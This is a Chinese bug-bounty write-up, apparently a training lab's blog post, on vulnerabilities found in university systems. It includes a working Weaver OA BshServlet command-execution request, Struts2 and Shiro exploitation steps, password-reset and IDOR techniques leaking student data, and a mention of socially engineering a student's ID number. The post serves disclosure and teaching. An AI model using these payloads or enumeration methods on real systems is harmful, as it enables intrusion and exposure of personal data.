eduSRC那些事儿-3(命令执行类+越权逻辑类)

点击星标,即时接收最新推文

18129a889d13c78c94ad3a27baccb8b1.png

本文对edusrc挖掘的部分漏洞进行整理,将案例脱敏后输出成文章,不包含0DAY/BYPASS的案例过程,仅对挖掘思路和方法进行相关讲解。

命令执行类

St2命令执行

在电量查询手机管理平台,观察到.do或.action后缀,

http://xxx:8080/mobile/mobile!login.action

85303e905d5af202173a656a322ac45b.jpeg

通过工具检测存在struts2-046漏洞,

a181b429cd63a127e5f445dc94b20bc9.png

判断存在system系统权限,

812497e889b609b89a8febf5572690d2.png

直接getshell和执行任意命令。

第三方应用命令执行

泛微OA Bsh 远程代码执行漏洞为例:

通过个人经验或者cms识别工具判断目标的CMS类型,

http://xxx:8080/login/Login.jsp?logintype=1

1f494f93eecf584dbf97d628619a1b3a.png

先验证漏洞:

http://xxx/weaver/bsh.servlet.BshServlet

可以执行任意函数,

77a2f3ec1b9ef1e649724963d6b1fffc.jpeg

然后上burpsuite,发送以下数据包:

POST /weaver/bsh.servlet.BshServlet HTTP/1.1

Host: xxx:8080

Accept: /

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Length: 98

Content-Type: application/x-www-form-urlencoded

bsh.script=eval%00("ex"%2b"ec(\"whoami\")");&bsh.servlet.captureOutErr=true&bsh.servlet.output=raw

4a65468f40a66ab75900eac0744cc703.png

成功获取root权限,实现任意命令执行。

Shiro远程命令执行 

某大学宿舍管理系统存在apache shiro反序列化:在登录页面时,提交表单后发现set-cookie存在remeberMe=deleteMe字样。

exp:

https://xz.aliyun.com/forum/upload/affix/shiro_tool.zip

如图:

java -jar shiro_tool.jar http://xxx.edu.cn/

011f8a0fac56d53e9b30b379f1650908.png

Key已经爆破成功,使用xray的shrio插件或者shiro_attack_1.5使用构造链即可执行任意命令。

越权逻辑类

密码重置

初次登陆需要更改密码,但未验证原始密码,

27b2943c7e16dcb6b6e309daff88bf32.png

利用审查元素或抓包更改学号为其他人的,成功重置他人密码,

35442b8179296a95674adea25017f1dd.png

管理功能未限制权限访问

先获取高权限用户权限,然后将高权限用户接口放到低权限用户上访问对其没有限制,如:

对全校学生进行管理,泄露数万学生个人敏感信息,

http://xxx.edu.cn/xxx/student_new/query.jsp?cdbh=xxx

e0c9326423c1c75d10831a20bdc71333.png

直接重置系统任意单位用户密码,

http://xxx/xxx/xxx/xxxPassword.jsp

527ef618fd72973a90244be90c0d715d.png

个人照片遍历

直接查看照片链接,是否存在参数或文件名称可猜解(包含学号、工号、ID值等信息),遍历即可获取所有个人照片。如:

1、参数遍历:

http://xxx.edu.cn/Common/ResourceReq.ashx?t=stupic&i=学号 ......

1bb85e570ac875c869ccc5ce94cd8412.png

2、文件名遍历:

http://xxx.edu.cn/attachments/ds_photo/工号.jpg http://xxx/xg/vfs/vfs.do?path=年份/STD_INFO/RXZP/学号.jpg ......

学工系统遍历学号

社工获取某学校学姐身份证号加学号等个人敏感信息,登录学工系统,在学工系统个人信息查看功能抓包,获取到以下接口,

254fb539bc3b239511454ab89ec7d970.png

通过修改学号获取个人相关敏感信息。

某大学体温上报系统,

2fd65cfa0e95253c115ddb3e7446bc28.jpeg

抓包更改接口,泄露密码、学号、身份证号、手机号、学院专业等信息。

9566ca33abed6264e491b8b1540fc354.png

过往推文:

eduSRC那些事儿-2(sql注入类+文件上传类)

eduSRC那些事儿-1(信息泄露+弱口令)

—  实验室旗下直播培训课程  —

5c053bdca6b683dddcbb4f6e76e5eb7a.png

f8247c602bd100815dc6b169b15cb2ae.jpeg

b1820ea86ee437d08413ab1b0cc12ef9.jpeg84129ddf65c646ee02228604ce5de57f.png

970d74960c4854ce4381f524a2a9bf72.png

d6b14a8baad51d8097de7a6c8f6271ed.jpeg

22faf6886ba26059e73312d9282ad70e.jpeg

2eae45c3e8d331a10c3708bd0248b0c9.jpeg

2ee0490da377df4e6ceda1d9d90bebe2.png

和20000+位同学加入MS08067一起学习

ea3e639759afc2e3a9b641486627cc67.gif

  • 17
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值